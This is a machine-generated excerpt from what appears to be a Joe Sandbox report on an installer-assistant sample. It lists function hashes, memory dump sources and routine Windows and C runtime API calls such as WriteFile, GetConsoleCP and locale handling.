                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                          • Instruction ID: 7390e38bf79f03bf001207945c81b3a9086c962b97f3b75ba8dbd623def5c065
                                                          • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                          • Instruction Fuzzy Hash: EB310873904A094FF341C52A8B84356F223DBC2379F6AC775D96687EFDCA7198478181
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                          • Instruction ID: 77075ed5f8a9b7072dd6ccb44fd8e2c96570263dd48b99e36e9a6b88ebefa808
                                                          • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                          • Instruction Fuzzy Hash: 4F41ADB29047068BD704CF19C89066AB3E4FF88318F454A3DED5AA7381E730FA25CB91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                          • Instruction ID: f0dd3165d611de35c9eff1de2dfc9741e1b558e0554152da38ed44da78bc81af
                                                          • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                          • Instruction Fuzzy Hash: 7E2148B1A087E707E720DE7ECCD037577D29BC2305F094279DAA08FA87D17984A2E664
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                          • Instruction ID: ab37b51902b35f5410cbd279526d84e9e1a66bb83d894b013bf2238ac57aff3a
                                                          • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                          • Instruction Fuzzy Hash: 3021257251453547C301DE2EE988677B7E1FFC4329F678A3ADD928B981C624D440CAA0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                                          • Instruction ID: c76fa301f83e401992b52f562859a7f8a67b5303f66928619ad53c47dbea018a
                                                          • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                                          • Instruction Fuzzy Hash: 9721F7326011248FC741EF6ADA8469B73E6FFC8375F67C63EDD8147A45C631E60686A0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction ID: f1122b930420fc929096ffb121788ea739d45b140c881f3f04b8876e4ca5122c
                                                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction Fuzzy Hash: 23E08C72A12638EBCB15EBC8C940D8AB3ECEB45B49B21009AF501E3610D271DE41CBD8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                          • API String ID: 3519838083-609671
                                                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction ID: 80bfe25fff8a158052693c84830db928a8aac86fdede578ff2a66daff3c4240a
                                                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction Fuzzy Hash: 21D1E831A05209DFDF11CFA4D990BEDBBB6FF05308F244519E065A3A50DB70A90ACBAD
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,6C6AB0D0,?), ref: 6C6ABEF9
                                                          • __fassign.LIBCMT ref: 6C6AC0D8
                                                          • __fassign.LIBCMT ref: 6C6AC0F5
                                                          • WriteFile.KERNEL32(?,6C6B5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6AC13D
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C6AC17D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6AC229
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID: Dt*%
                                                          • API String ID: 4031098158-1118161045
                                                          • Opcode ID: be4f5f056d5142a7a42d33d35b7e28b1ab8f910f67f4bea8c245002956afb011
                                                          • Instruction ID: 58efd710eaa4b47862e59f8cdc7b6cb603d8023523cd01503a2f02f652400a8a
                                                          • Opcode Fuzzy Hash: be4f5f056d5142a7a42d33d35b7e28b1ab8f910f67f4bea8c245002956afb011
                                                          • Instruction Fuzzy Hash: ADD17C71E05258AFCF15CFE8C8809EDBBB5BF49318F280169E856BB341D6329D46CB58
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C699B07
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C699B0F
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C699B98
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C699BC3
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C699C18
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: Dt*%$csm
                                                          • API String ID: 1170836740-3798115597
                                                          • Opcode ID: 3f988b6962209065d067a87128b79213c58f2af0bfa0016d99225a6b7cd24fde
                                                          • Instruction ID: d178e04b6a97be1ec1bc9cc208560e41363aec9ffcb198cebfc75c52e7eefb7d
                                                          • Opcode Fuzzy Hash: 3f988b6962209065d067a87128b79213c58f2af0bfa0016d99225a6b7cd24fde
                                                          • Instruction Fuzzy Hash: 9641B430A1121AAFCF00DF68C880AAE7BB5AF4732CF148155E81D9B755D735DA16CB9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: 4f112b2d5c2813a24cc123141c7b73da2ead5a485ffb6f3dd2b1e3e0ca0e032c
                                                          • Instruction ID: 49d2b7f47931183a756c1b48936e88eaa138eea22c5b422338f29c8a698e170d
                                                          • Opcode Fuzzy Hash: 4f112b2d5c2813a24cc123141c7b73da2ead5a485ffb6f3dd2b1e3e0ca0e032c
                                                          • Instruction Fuzzy Hash: 2221EB32A16221BBDB118BEDCC84A9A3779DB0F768F150651E815E7AC0D770DD0386ED
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C562F95
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C562FAF
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C562FD0
                                                          • __Getctype.LIBCPMT ref: 6C563084
                                                          • std::_Facet_Register.LIBCPMT ref: 6C56309C
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C5630B7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                          • String ID:
                                                          • API String ID: 1102183713-0
                                                          • Opcode ID: 94522d6c1218ef7953e828d0142aee27e5fbf510ca75b5352603dbfb722ba387
                                                          • Instruction ID: c04869fa4305656344cf5b2fff3e6801def2fcb226001355bb9cf45d85f73aa1
                                                          • Opcode Fuzzy Hash: 94522d6c1218ef7953e828d0142aee27e5fbf510ca75b5352603dbfb722ba387
                                                          • Instruction Fuzzy Hash: D34188B1E04219CFCB10CFA6C855B9EB7B0FF49728F044128D869ABB60D735A909CBD4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$__aullrem
                                                          • String ID:
                                                          • API String ID: 2022606265-0
                                                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction ID: 7ecbd0328392e228d6d0b0a3daab071bd7f34b564b66097c5c3856106da1b41f
                                                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction Fuzzy Hash: B121CEB0901219BFDF208F958D48DDF7A79EF817E8F218226B92061E90D6719DA0C6A5
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6DA6F1
                                                            • Part of subcall function 6C6E9173: __EH_prolog.LIBCMT ref: 6C6E9178
                                                          • __EH_prolog.LIBCMT ref: 6C6DA8F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: IJ$WIJ$J
                                                          • API String ID: 3519838083-740443243
                                                          • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction ID: 13c88dd3ee55a7c9d065eec9b4becd51bff86b1ca26f016438f0bbef7da59fde
                                                          • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction Fuzzy Hash: FD71B030A08255DFDB14CF64C484BEDB7B0FF15308F1180A9D855ABB92CB78BA49CB99
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6C562A76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: U#Vl$q!Vl$Jbx$Jbx
                                                          • API String ID: 4194217158-2877385751
                                                          • Opcode ID: 8a00e6d5a4721ca10132ea5111928b7df94fd796b5b59279e7a5d620148b5e10
                                                          • Instruction ID: 4a7ffedfabc6a1d5b566e02de5546ae7e255bd911373baadc0f242cc5469d977
                                                          • Opcode Fuzzy Hash: 8a00e6d5a4721ca10132ea5111928b7df94fd796b5b59279e7a5d620148b5e10
                                                          • Instruction Fuzzy Hash: 515124B1D002049FCB10CF5ACC84A9EBBB5EF89318F14856EE8499BB51E371D985CF92
                                                          APIs
                                                          • _free.LIBCMT ref: 6C6B5ADD
                                                          • _free.LIBCMT ref: 6C6B5B06
                                                          • SetEndOfFile.KERNEL32(00000000,6C6B46EC,00000000,6C6AB0D0,?,?,?,?,?,?,?,6C6B46EC,6C6AB0D0,00000000), ref: 6C6B5B38
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C6B46EC,6C6AB0D0,00000000,?,?,?,?,00000000,?), ref: 6C6B5B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID: 8Q
                                                          • API String ID: 1547350101-4022487301
                                                          • Opcode ID: cbb5cf5c7581d6eb10cbb978bb10da8fea9c9b6ab1ccefe8f8216ac3c3080306
                                                          • Instruction ID: f0bd50eba1d78fc0c533c4568492b079c048ae9e45bdba5b014e617e50bdb63a
                                                          • Opcode Fuzzy Hash: cbb5cf5c7581d6eb10cbb978bb10da8fea9c9b6ab1ccefe8f8216ac3c3080306
                                                          • Instruction Fuzzy Hash: 5941E932500645ABDB019BB9CC81BDE3BB5EF4A328F250511F424F7B90EB74C865876D
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6EE41D
                                                            • Part of subcall function 6C6EEE40: __EH_prolog.LIBCMT ref: 6C6EEE45
                                                            • Part of subcall function 6C6EE8EB: __EH_prolog.LIBCMT ref: 6C6EE8F0
                                                            • Part of subcall function 6C6EE593: __EH_prolog.LIBCMT ref: 6C6EE598
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: &qB$0aJ$A0$XqB
                                                          • API String ID: 3519838083-1326096578
                                                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction ID: 57fa9c67220d83222f03931ed9930e49bd335881ca7696f221d62917c27c0fa3
                                                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction Fuzzy Hash: 10218B71E05258EACB05DBE5D9949EDBBB4EF16318F20402AE41267781DB781E0CCB59
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C69F1B4,?,?,6C69F235,?,?,?), ref: 6C69F13F
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C69F152
                                                          • FreeLibrary.KERNEL32(00000000,?,?,6C69F1B4,?,?,6C69F235,?,?,?), ref: 6C69F175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: b38cba859a8f5917cb830a018e0e07416f18332034baca74e69a5872eb8e7442
                                                          • Instruction ID: 6224938498c916a2524aeab28b19f28082148744072382027e5e6e324255b5ec
                                                          • Opcode Fuzzy Hash: b38cba859a8f5917cb830a018e0e07416f18332034baca74e69a5872eb8e7442
                                                          • Instruction Fuzzy Hash: 7BF01C31601619FBDF02EB91C949FAE7A79EB0575AF210065F815E2560CB708B40DAD9
                                                          APIs
                                                          • __EH_prolog3.LIBCMT ref: 6C69732E
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C697339
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C6973A7
                                                            • Part of subcall function 6C697230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C697248
                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 6C697354
                                                          • _Yarn.LIBCPMT ref: 6C69736A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                          • String ID:
                                                          • API String ID: 1088826258-0
                                                          • Opcode ID: eeea89e8a8f5e4c2e0034faa40115d96900bc43df7c5f23c14947f08b1b49d80
                                                          • Instruction ID: c5f6b32c05ddaeaa91b770e778552ce8b71561991742cb020b5e6fa3b7ebaf47
                                                          • Opcode Fuzzy Hash: eeea89e8a8f5e4c2e0034faa40115d96900bc43df7c5f23c14947f08b1b49d80
                                                          • Instruction Fuzzy Hash: 5E018F757046129BDB06DF20C9509BD77B1FF86254B150019D81297780CF34AA57DFDD
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $!$@
                                                          • API String ID: 3519838083-2517134481
                                                          • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction ID: 597da4678fc8ce171bb8b15fbb5a0755b197eccbbbc982d3ede8750080274d40
                                                          • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction Fuzzy Hash: 01127F74D19289DFCB04CFA4C694ADDBBB1FF09308F188469E845ABF51DB31AA45CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog__aulldiv
                                                          • String ID: $SJ
                                                          • API String ID: 4125985754-3948962906
                                                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction ID: 29899bcfb849f47ef2d2f0287f6aad1015ff0858049af47952655aaefb00660b
                                                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction Fuzzy Hash: 29B16DB1D0520ADFCB14CF95C9849EEBBF2FF48318B20852ED515A7B50D730AA45CB98
                                                          APIs
